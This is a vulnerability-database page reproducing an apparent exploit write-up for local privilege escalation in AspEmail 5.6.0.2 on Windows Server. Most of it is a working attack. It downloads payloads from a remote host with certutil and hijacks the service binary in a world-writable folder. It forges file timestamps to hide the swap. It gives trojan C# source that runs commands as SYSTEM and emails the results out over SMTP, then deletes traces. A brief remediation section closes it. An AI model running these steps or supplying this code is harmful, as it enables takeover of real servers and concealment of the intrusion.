Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

AspEmail 5.6.0.2 Weak Permissions / Local Privilege Escalation

🗓️ 17 Apr 2023 00:00:00Reported by Zer0FauLTType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 312 Views

AspEmail 5.6.0.2 Weak Permissions / Local Privilege Escalation, Exploit tested on Windows Server 2016 and 2019, Detected Binary Permission Vulnerability

Code
`####################################################################################################################  
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #  
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #  
# Date: 13/04/2023 #  
# Exploit Author: Zer0FauLT [[email protected]] #  
# Vendor Homepage: https://www.aspemail.com #  
# Software Link: https://www.aspemail.com/download.html #  
# Product: AspEmail #  
# Version: AspEmail 5.6.0.2 and all #  
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #  
# Tested on: Windows Server 2016 and Windows Server 2019 #  
# CVE : 0DAY #  
####################################################################################################################  
  
# ==================================================================================================================  
  
[+] C:\PenTest>whoami /priv  
  
PRIVILEGES INFORMATION  
----------------------  
  
Privilege Name Description State   
============================= ========================================= ========  
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled  
SeChangeNotifyPrivilege Bypass traverse checking Enabled   
SeImpersonatePrivilege Impersonate a client after authentication Enabled   
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled  
  
# ==================================================================================================================  
  
* First, we will test whether the AspEmail service is active.  
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:  
  
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe  
EmailAgent.exe 4400 Persits Software EmailAgent  
  
or   
  
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe  
EmailAgent64.exe 4400 Persits Software EmailAgent  
  
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING".   
* Now we know that AspEmail service is active.  
  
# ==================================================================================================================  
  
* We will need these:  
  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"  
  
# ==================================================================================================================  
  
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"  
  
Name: Persits Software EmailAgent  
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email  
Agent.exe" /run  
User : LocalSystem  
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN  
IdentityReference : Everyone  
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,   
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,   
ReadExtendedAttributes, DeleteChild, Execute/Traverse  
Status : Unknown  
UserCanStart : False  
UserCanStop : False  
  
[+] C:\PenTest>del PrivescCheck.ps1  
  
* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.  
  
# ================================================================================================================== #  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"  
  
Successfully processed 0 files; Failed processing 1 files  
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.  
  
* We do not have permission to access subdirectories.  
  
# ==================================================================================================================  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
  
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)  
DeepSecLab\psacln:(I)(OI)(CI)(N)  
DeepSecLab\psaadm:(I)(OI)(CI)(N)  
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)  
BUILTIN\Administrators:(I)(F)  
CREATOR OWNER:(I)(OI)(CI)(IO)(F)  
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)  
NT SERVICE\TrustedInstaller:(I)(CI)(F)  
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)  
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)  
BUILTIN\Users:(I)(OI)(CI)(RX)  
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)  
  
* Unlike other directories, we have full privileges in the "BIN" directory of the service.   
* This is chmod 0777 - rwxrwxrwx in linux language.  
  
# ==================================================================================================================  
  
[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID  
  
__PATH   
  
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"   
  
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"  
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16  
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators  
  
* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.  
  
# ==================================================================================================================  
  
* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.  
  
[+] C:\PenTest>whoami  
DeepSecLab\Hacker  
  
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".  
  
[+] C:\PenTest>"C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F  
  
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN  
Successfully processed 1 files; Failed processing 0 files  
  
* Ok. All commands resulted successfully. We now have full privileges for this directory.   
  
# ==================================================================================================================  
  
* Now we will modify the EmailAgent file and inject a self-written malware.   
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe  
  
# ==================================================================================================================  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir  
Volume in drive C has no label.  
Volume Serial Number is 0C8A-5291  
  
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin  
  
14.04.2023 16:47 <DIR> .  
14.04.2023 16:47 <DIR> ..  
01.03.2004 15:55 143.360 AspEmail.dll  
25.02.2004 16:23 188.416 AspUpload.dll  
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== Renamed for EmailAgentPrivESC.exe  
24.09.2003 09:22 139.264 EmailAgentCfg.cpl  
24.09.2003 09:25 94.208 EmailLogger.dll  
24.09.2003 09:21 167.936 Null.EmailAgent.exe  
6 File(s) 745.472 bytes  
2 Dir(s) 165.936.717.824 bytes free  
  
# ==================================================================================================================  
  
* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe  
  
# ==================================================================================================================  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir  
Volume in drive C has no label.  
Volume Serial Number is 0C8A-5291  
  
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin  
  
14.04.2023 16:47 <DIR> .  
14.04.2023 16:47 <DIR> ..  
01.03.2004 15:55 143.360 AspEmail.dll  
25.02.2004 16:23 188.416 AspUpload.dll  
24.09.2003 09:21 12.288 EmailAgent.exe  
24.09.2003 09:22 139.264 EmailAgentCfg.cpl  
24.09.2003 09:25 94.208 EmailLogger.dll  
24.09.2003 09:21 167.936 Null.EmailAgent.exe  
6 File(s) 745.472 bytes  
2 Dir(s) 165.936.717.824 bytes free  
  
[24.09.2003 09:21] 12.288 EmailAgent.exe  
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe  
  
* And time manipulation is over. They look like they were uploaded at the same time long ago.  
  
# ==================================================================================================================  
  
* Now we check for my malware ownership.  
  
[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID  
  
__PATH   
  
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"   
  
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28  
  
[+] wmic useraccount where sid="S-1-5-21-3674093405-176013069-2091862131-1511" get name  
  
Name   
  
DeepSecLab\Hacker   
  
EmailAgent.exe Owner: DeepSecLab\Hacker  
  
# =================================================================================================================#  
# #  
####################################################################################################################  
# #[EmailAgent.exe]# #  
####################################################################################################################  
# #   
#  
* We program this malware in such a way that when the server is reboot(when the services are restarted), #  
* It will be triggered and execute the codes we want, #  
* And then send a printout of all this to the email address we specified. #  
#  
using System; #  
using System.Linq; #  
using System.Text; #  
using System.Diagnostics; #  
using System.IO; #  
using System.Collections; #  
#  
namespace CliToolSpace #  
{ #  
class _Main #  
{ #  
static void Main(string[] args) #  
{ #  
Cli commandLine = new Cli(); #  
commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #  
commandLine.Execute(); #  
commandLine.ToFile(@"C:\Windows\Temp\"); #  
} #  
} #  
} #  
#  
# #  
####################################################################################################################  
# #[Mail.exe]# #  
####################################################################################################################  
# #  
#  
using System; #  
using System.Net.Mail; #  
using System.Net; #  
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #  
var mail = new MailMessage(); #  
mail.From = new MailAddress("[email protected]"); #  
mail.To.Add("[email protected]"); #  
mail.Subject = "Trigger Successful!"; #  
mail.IsBodyHtml = true; #  
string htmlBody; #  
htmlBody = "<strong>This server has been rebooted.</strong>"; #  
mail.Body = htmlBody; #  
Attachment attachment; #  
attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #  
mail.Attachments.Add(attachment); #  
SmtpServer.Port = 587; #  
SmtpServer.UseDefaultCredentials = false; #  
SmtpServer.Credentials = new System.Net.NetworkCredential("[email protected]","p@ssw0rd123"); #  
SmtpServer.EnableSsl = true; #  
SmtpServer.Timeout = int.MaxValue; #  
SmtpServer.Send(mail); #  
#  
# #  
####################################################################################################################  
# #[Run.bat]# #  
####################################################################################################################  
# #  
#  
whoami > C:\Windows\Temp\Export.txt #  
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #  
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #  
cd c:\Windows\Tasks #  
del Run.bat & del Mail.exe #  
#  
# #  
####################################################################################################################  
# #  
[+]Trigger Successful![+] #  
#  
[+] C:\PenTest>systeminfo | findstr "Boot Time" #  
System Boot Time: 13.04.2022, 07:46:06 #  
#  
# #  
####################################################################################################################  
#[Export.txt]# #  
####################################################################################################################  
# #  
#  
NT AUTHORITY\SYSTEM #  
#  
# #  
####################################################################################################################  
# #   
# ==================================================================================================================  
# ...|||[FIX]|||... #  
# ==================================================================================================================  
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #  
# =================================================================================================================#  
  
[+] C:\Administrator>sc qc "Persits Software EmailAgent"  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: Persits Software EmailAgent  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Persits Software EmailAgent  
DEPENDENCIES : rpcss  
SERVICE_START_NAME : LocalSystem  
  
# ==================================================================================================================  
  
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"  
  
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)  
  
# ==================================================================================================================  
  
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula  
  
Accesschk v6.15 - Reports effective permissions for securable objects  
Copyright (C) 2006-2022 Mark Russinovich  
Sysinternals - www.sysinternals.com  
  
Persits Software EmailAgent  
Medium Mandatory Level (Default) [No-Write-Up]  
RW NT AUTHORITY\SYSTEM  
SERVICE_ALL_ACCESS  
RW BUILTIN\Administrators  
SERVICE_ALL_ACCESS  
  
# ==================================================================================================================  
  
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
  
Successfully processed 0 files; Failed processing 1 files  
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.  
  
DONE!  
  
# ==================================================================================================================  
  
[+] C:\Administrator>sc stop "Persits Software EmailAgent"  
  
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"  
  
* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.  
  
# ==================================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Apr 2023 00:00Current
6.8Medium risk
Vulners AI Score6.8
aspemailweak permissionslocal privilege escalationwindows serverbinary permission vulnerabilityexploit tested
312